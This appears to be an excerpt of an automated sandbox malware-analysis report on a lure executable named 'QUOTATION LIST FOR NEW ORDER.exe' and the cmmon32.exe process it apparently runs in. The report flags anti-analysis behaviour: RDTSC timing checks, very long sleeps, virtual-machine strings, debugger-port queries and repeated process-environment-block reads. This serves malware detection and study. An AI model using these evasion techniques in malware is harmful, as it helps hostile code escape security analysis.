          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000030485E4 second address: 00000000030485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 000000000304896E second address: 0000000003048974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_004088A0 rdtsc 10_2_004088A0
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe TID: 5528Thread sleep time: -39425s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe TID: 5652Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread delayed: delay time: 39425Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000B.00000000.338604104.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.338604104.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000B.00000000.338855726.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.338855726.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 0000000B.00000000.360571948.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.338855726.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 0000000B.00000000.338696952.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 0000000B.00000000.338696952.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000B.00000000.335267258.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: cmmon32.exe, 0000000C.00000002.513886346.0000000000683000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_004088A0 rdtsc 10_2_004088A0
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00409B10 LdrLoadDll,10_2_00409B10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04853884 mov eax, dword ptr fs:[00000030h]12_2_04853884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04853884 mov eax, dword ptr fs:[00000030h]12_2_04853884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F746D mov eax, dword ptr fs:[00000030h]12_2_047F746D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]12_2_048020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]12_2_048020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]12_2_048020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]12_2_048020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]12_2_048020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]12_2_048020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048190AF mov eax, dword ptr fs:[00000030h]12_2_048190AF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F0050 mov eax, dword ptr fs:[00000030h]12_2_047F0050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F0050 mov eax, dword ptr fs:[00000030h]12_2_047F0050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480F0BF mov ecx, dword ptr fs:[00000030h]12_2_0480F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480F0BF mov eax, dword ptr fs:[00000030h]12_2_0480F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480F0BF mov eax, dword ptr fs:[00000030h]12_2_0480F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]12_2_047EB02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]12_2_047EB02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]12_2_047EB02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]12_2_047EB02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]12_2_0486B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov ecx, dword ptr fs:[00000030h]12_2_0486B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]12_2_0486B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]12_2_0486B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]12_2_0486B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]12_2_0486B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8CD6 mov eax, dword ptr fs:[00000030h]12_2_048A8CD6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048914FB mov eax, dword ptr fs:[00000030h]12_2_048914FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856CF0 mov eax, dword ptr fs:[00000030h]12_2_04856CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856CF0 mov eax, dword ptr fs:[00000030h]12_2_04856CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856CF0 mov eax, dword ptr fs:[00000030h]12_2_04856CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A740D mov eax, dword ptr fs:[00000030h]12_2_048A740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A740D mov eax, dword ptr fs:[00000030h]12_2_048A740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A740D mov eax, dword ptr fs:[00000030h]12_2_048A740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]12_2_04891C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]12_2_04856C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]12_2_04856C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]12_2_04856C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]12_2_04856C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D58EC mov eax, dword ptr fs:[00000030h]12_2_047D58EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857016 mov eax, dword ptr fs:[00000030h]12_2_04857016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857016 mov eax, dword ptr fs:[00000030h]12_2_04857016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857016 mov eax, dword ptr fs:[00000030h]12_2_04857016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A4015 mov eax, dword ptr fs:[00000030h]12_2_048A4015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A4015 mov eax, dword ptr fs:[00000030h]12_2_048A4015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480BC2C mov eax, dword ptr fs:[00000030h]12_2_0480BC2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]12_2_0480002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]12_2_0480002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]12_2_0480002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]12_2_0480002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]12_2_0480002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A44B mov eax, dword ptr fs:[00000030h]12_2_0480A44B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486C450 mov eax, dword ptr fs:[00000030h]12_2_0486C450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486C450 mov eax, dword ptr fs:[00000030h]12_2_0486C450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E849B mov eax, dword ptr fs:[00000030h]12_2_047E849B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04892073 mov eax, dword ptr fs:[00000030h]12_2_04892073
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9080 mov eax, dword ptr fs:[00000030h]12_2_047D9080
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A1074 mov eax, dword ptr fs:[00000030h]12_2_048A1074
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]12_2_04802581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]12_2_04802581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]12_2_04802581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]12_2_04802581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A185 mov eax, dword ptr fs:[00000030h]12_2_0480A185
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FC577 mov eax, dword ptr fs:[00000030h]12_2_047FC577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FC577 mov eax, dword ptr fs:[00000030h]12_2_047FC577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB171 mov eax, dword ptr fs:[00000030h]12_2_047DB171
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB171 mov eax, dword ptr fs:[00000030h]12_2_047DB171
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802990 mov eax, dword ptr fs:[00000030h]12_2_04802990
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480FD9B mov eax, dword ptr fs:[00000030h]12_2_0480FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480FD9B mov eax, dword ptr fs:[00000030h]12_2_0480FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC962 mov eax, dword ptr fs:[00000030h]12_2_047DC962
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048061A0 mov eax, dword ptr fs:[00000030h]12_2_048061A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048061A0 mov eax, dword ptr fs:[00000030h]12_2_048061A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048035A1 mov eax, dword ptr fs:[00000030h]12_2_048035A1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048569A6 mov eax, dword ptr fs:[00000030h]12_2_048569A6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A05AC mov eax, dword ptr fs:[00000030h]12_2_048A05AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A05AC mov eax, dword ptr fs:[00000030h]12_2_048A05AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F7D50 mov eax, dword ptr fs:[00000030h]12_2_047F7D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04801DB5 mov eax, dword ptr fs:[00000030h]12_2_04801DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04801DB5 mov eax, dword ptr fs:[00000030h]12_2_04801DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04801DB5 mov eax, dword ptr fs:[00000030h]12_2_04801DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FB944 mov eax, dword ptr fs:[00000030h]12_2_047FB944
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FB944 mov eax, dword ptr fs:[00000030h]12_2_047FB944
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]12_2_048551BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]12_2_048551BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]12_2_048551BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]12_2_048551BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]12_2_047E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]12_2_04856DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]12_2_04856DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]12_2_04856DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov ecx, dword ptr fs:[00000030h]12_2_04856DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]12_2_04856DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]12_2_04856DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DAD30 mov eax, dword ptr fs:[00000030h]12_2_047DAD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]12_2_047F4120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]12_2_047F4120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]12_2_047F4120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]12_2_047F4120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov ecx, dword ptr fs:[00000030h]12_2_047F4120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048641E8 mov eax, dword ptr fs:[00000030h]12_2_048641E8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04888DF1 mov eax, dword ptr fs:[00000030h]12_2_04888DF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9100 mov eax, dword ptr fs:[00000030h]12_2_047D9100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9100 mov eax, dword ptr fs:[00000030h]12_2_047D9100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9100 mov eax, dword ptr fs:[00000030h]12_2_047D9100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB1E1 mov eax, dword ptr fs:[00000030h]12_2_047DB1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB1E1 mov eax, dword ptr fs:[00000030h]12_2_047DB1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB1E1 mov eax, dword ptr fs:[00000030h]12_2_047DB1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047ED5E0 mov eax, dword ptr fs:[00000030h]12_2_047ED5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047ED5E0 mov eax, dword ptr fs:[00000030h]12_2_047ED5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0485A537 mov eax, dword ptr fs:[00000030h]12_2_0485A537
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480513A mov eax, dword ptr fs:[00000030h]12_2_0480513A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480513A mov eax, dword ptr fs:[00000030h]12_2_0480513A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804D3B mov eax, dword ptr fs:[00000030h]12_2_04804D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804D3B mov eax, dword ptr fs:[00000030h]12_2_04804D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804D3B mov eax, dword ptr fs:[00000030h]12_2_04804D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8D34 mov eax, dword ptr fs:[00000030h]12_2_048A8D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04813D43 mov eax, dword ptr fs:[00000030h]12_2_04813D43
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04853540 mov eax, dword ptr fs:[00000030h]12_2_04853540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]12_2_047D2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]12_2_047D2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]12_2_047D2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]12_2_047D2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]12_2_047D2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FC182 mov eax, dword ptr fs:[00000030h]12_2_047FC182
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486FE87 mov eax, dword ptr fs:[00000030h]12_2_0486FE87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]12_2_047FAE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]12_2_047FAE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]12_2_047FAE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]12_2_047FAE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]12_2_047FAE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E766D mov eax, dword ptr fs:[00000030h]12_2_047E766D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480D294 mov eax, dword ptr fs:[00000030h]12_2_0480D294
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480D294 mov eax, dword ptr fs:[00000030h]12_2_0480D294
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048546A7 mov eax, dword ptr fs:[00000030h]12_2_048546A7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A0EA5 mov eax, dword ptr fs:[00000030h]12_2_048A0EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A0EA5 mov eax, dword ptr fs:[00000030h]12_2_048A0EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A0EA5 mov eax, dword ptr fs:[00000030h]12_2_048A0EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480FAB0 mov eax, dword ptr fs:[00000030h]12_2_0480FAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]12_2_047D9240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]12_2_047D9240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]12_2_047D9240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]12_2_047D9240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]12_2_047E7E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]12_2_047E7E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]12_2_047E7E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]12_2_047E7E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]12_2_047E7E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]12_2_047E7E41
